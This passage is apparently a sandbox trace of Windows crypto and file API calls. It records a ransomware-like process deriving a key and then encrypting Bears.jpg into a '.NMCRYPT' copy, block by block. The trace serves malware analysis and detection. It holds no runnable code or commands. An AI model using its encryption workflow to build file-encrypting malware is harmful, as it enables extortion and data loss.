returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.487] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.490] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0162.490] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0162.490] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0162.490] CryptHashData (hHash=0x9ad4b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.490] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad4b8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad338) returned 1 [0162.490] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0162.490] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0162.490] wcslen (_String="\\\\?\\") returned 0x4 [0162.490] CryptDuplicateKey (in: hKey=0x9ad338, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad778) returned 1 [0162.491] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0162.491] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0162.500] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=1074) returned 1 [0162.500] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0162.501] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.578] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.578] GetLastError () returned 0x0 [0162.578] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.580] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.580] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.580] GetLastError () returned 0x0 [0162.580] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.580] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.580] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.580] GetLastError () returned 0x0 [0162.580] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.580] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: 